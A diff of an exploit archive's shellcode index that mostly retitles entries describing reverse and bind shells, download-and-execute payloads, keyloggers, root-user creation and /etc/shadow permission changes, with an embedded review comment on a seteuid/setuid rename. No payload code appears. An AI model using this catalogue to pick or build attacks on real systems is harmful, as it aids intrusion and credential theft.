+34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86
 35205,shellcodes/linux_x86-64/35205.asm,"Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
 35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
 35586,shellcodes/linux_x86-64/35586.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
-35587,shellcodes/linux_x86-64/35587.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
+35587,shellcodes/linux_x86-64/35587.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
 35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
 35794,shellcodes/windows_x86-64/35794.txt,"Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
 35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
-36411,shellcodes/generator/36411.py,"Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
-36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
-36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
+36411,shellcodes/generator/36411.py,"Windows/x64 (XP) - Download File + Execute Shellcode Using PowerShell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
+36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod(/etc/shadow 666) Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
+36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod(/etc/passwd 666) Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
 36359,shellcodes/linux_x86-64/36359.c,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64
-36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
+36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) + ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
-36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
+36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts + Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
@@ -492,7 +492,7 @@ id,file,description,date,author,type,platform
 36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve(/bin/sh) Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86
 36779,shellcodes/windows_x86/36779.c,"Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
 36780,shellcodes/windows_x86/36780.c,"Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
-36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
+36781,shellcodes/generator/36781.py,"Linux/x86 - Custom execve() + 'Followtheleader' Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
 36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
 36858,shellcodes/linux_x86-64/36858.c,"Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
 36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
@@ -502,17 +502,17 @@ id,file,description,date,author,type,platform
 37285,shellcodes/linux_x86/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86
 37289,shellcodes/linux_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86
 37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86
-37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
+37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir(HACK) + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
 37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
 37362,shellcodes/linux_x86-64/37362.c,"Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
 37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
-37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
+37366,shellcodes/linux_x86/37366.c,"Linux/x86 - reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
 37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2015-06-26,"Bill Borskey",shellcode,linux_x86
 37390,shellcodes/linux_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
-37401,shellcodes/linux_x86-64/37401.asm,"Linux/x64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
+37401,shellcodes/linux_x86-64/37401.asm,"Linux/x64 - execve() + Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
 37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode (Generator)",2015-07-05,"Artem T",shellcode,linux_x86
 37664,shellcodes/windows_x86/37664.c,"Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86
 37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86
@@ -547,7 +547,7 @@ id,file,description,date,author,type,platform
 39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
 39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,Sathishshan,shellcode,linux_x86-64
 39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
-39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
+39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File (//192.168.1.19/c) Via WebDAV + Execute Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
 39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
 39617,shellcodes/linux_x86-64/39617.c,"Linux/x64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
 39624,shellcodes/linux_x86-64/39624.c,"Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
@@ -559,16 +559,16 @@ id,file,description,date,author,type,platform 39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 39728,shellcodes/generator/39728.py,"Linux/x64 - Bind (/TCP) Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator -39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows +39731,shellcodes/windows/39731.c,"Windows - Keylogger To File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows 39754,shellcodes/windows_x86/39754.txt,"Windows/x86 (.Net Framework) - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86 39758,shellcodes/linux_x86-64/39758.c,"Linux/x64 - Bind (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 39763,shellcodes/linux_x86-64/39763.c,"Linux/x64 - Reverse (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 -39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows +39794,shellcodes/windows/39794.c,"Windows - Keylogger To File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows 39815,shellcodes/generator/39815.c,"Linux/x86 - Bind (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator 39847,shellcodes/linux_x86-64/39847.c,"Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan 
Shifat",shellcode,linux_x86-64 39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86 39869,shellcodes/linux_x86-64/39869.c,"Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 -39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple +39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator)",2016-06-06,odzhancode,shellcode,multiple 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86 39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86 39914,shellcodes/windows_x86/39914.c,"Windows/x86 - system(systeminfo) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86 
@@ -580,7 +580,7 @@ id,file,description,date,author,type,platform
 40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
 40061,shellcodes/linux_x86-64/40061.c,"Linux/x64 - Bind (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
 40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
-40079,shellcodes/linux_x86-64/40079.c,"Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
+40079,shellcodes/linux_x86-64/40079.c,"Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing Via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
 40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse (127.1.1.1:10/TCP) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
 40122,shellcodes/linux_x86-64/40122.c,"Linux/x64 - Bind (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
 40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
@@ -640,9 +640,9 @@ id,file,description,date,author,type,platform
 43639,shellcodes/linux_x86/43639.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (58 bytes)",2009-01-01,dev0id,shellcode,linux_x86
 43640,shellcodes/bsd_x86/43640.c,"BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
 43641,shellcodes/linux_x86/43641.c,"Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes)",2009-01-01,dev0id,shellcode,linux_x86
-43642,shellcodes/bsd_x86/43642.c,"BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
-43643,shellcodes/linux_x86/43643.c,"Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,linux_x86
-43644,shellcodes/bsd_x86/43644.asm,"BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43642,shellcodes/bsd_x86/43642.c,"BSD/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43643,shellcodes/linux_x86/43643.c,"Linux/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,linux_x86
+43644,shellcodes/bsd_x86/43644.asm,"BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (31 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
 43645,shellcodes/bsd_x86/43645.asm,"BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
 43646,shellcodes/linux_x86/43646.c,"Linux/x86 - Bind (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)",2009-01-01,lamagra,shellcode,linux_x86
 43647,shellcodes/linux_x86/43647.c,"Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)",2009-01-01,Shok,shellcode,linux_x86
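Review bot: The 43644 row changes the described call from `seteuid(0)` to `setuid(0)`, which alters what the title says the payload does, unlike the two rows above it that only recapitalise `To`/`With`. The two calls are not equivalent, so the title should match what shellcodes/bsd_x86/43644.asm actually invokes. That file is not part of this diff, so the rename cannot be confirmed from here and should be checked against it. Anyone triaging a sample or writing a detection from the index relies on the named syscall being accurate.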
@@ -658,7 +658,7 @@ id,file,description,date,author,type,platform
 43657,shellcodes/linux_x86/43657.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__0_0) Shellcode (28 bytes)",2009-01-01,storm,shellcode,linux_x86
 43658,shellcodes/linux_x86/43658.c,"Linux/x86 - execve(/bin/sh_0_0) Shellcode (21 bytes)",2009-01-01,storm,shellcode,linux_x86
 43660,shellcodes/linux_x86/43660.c,"Linux/x86 - fork() + setreuid(0_ 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)",2009-01-01,anonymous,shellcode,linux_x86
-43661,shellcodes/linux_x86/43661.c,"Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)",2000-12-20,"Cody Tubbs",shellcode,linux_x86
+43661,shellcodes/linux_x86/43661.c,"Linux/x86 - Audio (knock knock knock) Via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)",2000-12-20,"Cody Tubbs",shellcode,linux_x86
 43662,shellcodes/linux_x86/43662.c,"Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43663,shellcodes/linux_x86/43663.c,"Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43664,shellcodes/linux_x86/43664.c,"Linux/x86 - Flush IPTables Rules (execve(/sbin/iptables -F)) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
@@ -675,7 +675,7 @@ id,file,description,date,author,type,platform
 43680,shellcodes/linux_x86/43680.c,"Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
 43681,shellcodes/linux_x86/43681.c,"Linux/x86 - setuid(0) + chmod(/etc/shadow_ 0666) Shellcode (37 bytes)",2009-01-01,antrhacks,shellcode,linux_x86
 43684,shellcodes/linux_x86/43684.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (89 bytes)",2009-01-01,agix,shellcode,linux_x86
-43685,shellcodes/linux_x86/43685.c,"Linux/x86 - Remote File Download Shellcode (42 bytes)",2009-01-01,"Jonathan Salwan",shellcode,linux_x86
+43685,shellcodes/linux_x86/43685.c,"Linux/x86 - Download File Shellcode (42 bytes)",2009-01-01,"Jonathan Salwan",shellcode,linux_x86
 43686,shellcodes/linux_x86/43686.c,"Linux/x86 - CDRom Ejecting Shellcode (46 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 43687,shellcodes/linux_x86/43687.c,"Linux/x86 - sethostname(PwNeD !!_ 8) Shellcode (32 bytes)",2009-05-31,gunslinger_,shellcode,linux_x86
 43688,shellcodes/linux_x86/43688.c,"Linux/x86 - exit(0) Shellcode (8 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
@@ -715,9 +715,9 @@ id,file,description,date,author,type,platform
 43732,shellcodes/linux_x86/43732.c,"Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43735,shellcodes/linux_x86/43735.c,"Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43736,shellcodes/linux_x86/43736.c,"Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43737,shellcodes/linux_x86/43737.c,"Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43737,shellcodes/linux_x86/43737.c,"Linux/x86 - reboot() + Mutated + Null-Free Shellcode (55 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43738,shellcodes/linux_x86/43738.c,"Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43739,shellcodes/linux_x86/43739.c,"Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43739,shellcodes/linux_x86/43739.c,"Linux/x86 - execve(wget) + Mutated + Null-Free Shellcode (96 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43740,shellcodes/linux_x86/43740.c,"Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43741,shellcodes/generator/43741.py,"Linux/x86 - Uzumaki Encryptor Shellcode (Generator)",2013-01-01,"Geyslan G. Bem",shellcode,generator
 43742,shellcodes/linux_x86/43742.c,"Linux/x86 - Bind (31337/TCP) Shell Shellcode (108 bytes)",2009-01-01,"Russell Willis",shellcode,linux_x86
@@ -726,9 +726,9 @@ id,file,description,date,author,type,platform
 43745,shellcodes/linux_x86/43745.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86
 43746,shellcodes/linux_x86/43746.c,"Linux/x86 - Bind (/TCP) Shell Shellcode (112 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86
 43747,shellcodes/linux_x86/43747.c,"Linux/x86 - Reverse (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
-43748,shellcodes/linux_x86/43748.c,"Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
-43749,shellcodes/linux_x86/43749.asm,"Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
-43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
+43748,shellcodes/linux_x86/43748.c,"Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + Execute Shellcode (108 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
+43749,shellcodes/linux_x86/43749.asm,"Linux/x86 - execve(/bin/sh) Using jump/call/pop Shellcode (52 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
+43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd To /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
 43751,shellcodes/linux_x86/43751.asm,"Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)",2009-01-01,"Shihao Song",shellcode,linux_x86
 43752,shellcodes/linux_x86/43752.asm,"Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
 43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith Jayathissa",shellcode,linux_x86
@@ -759,13 +759,13 @@ id,file,description,date,author,type,platform 40549,shellcodes/windows_x86-64/40549.c,"Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86 40781,shellcodes/windows_x86-64/40781.c,"Windows/x64 - Reverse (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 -40808,shellcodes/linux_x86-64/40808.c,"Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64 +40808,shellcodes/linux_x86-64/40808.c,"Linux/x64 - execve(/bin/sh -c reboot) Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64 40821,shellcodes/windows_x86-64/40821.c,"Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse (/TCP) Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86 40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86 40981,shellcodes/windows_x86-64/40981.c,"Windows/x64 - Bind (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 41072,shellcodes/windows_x86-64/41072.c,"Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 -41089,shellcodes/linux_x86-64/41089.c,"Linux/x64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64 
+41089,shellcodes/linux_x86-64/41089.c,"Linux/x64 - mkdir(ajit) Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64 41128,shellcodes/linux_x86-64/41128.c,"Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64 41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64 41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux 
@@ -801,12 +801,12 @@ id,file,description,date,author,type,platform
 43507,shellcodes/freebsd_x86/43507.c,"FreeBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
 43508,shellcodes/irix/43508.c,"IRIX - execve(/bin/sh -c) Shellcode (72 bytes)",2009-01-01,anonymous,shellcode,irix
 43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,shellcode,irix
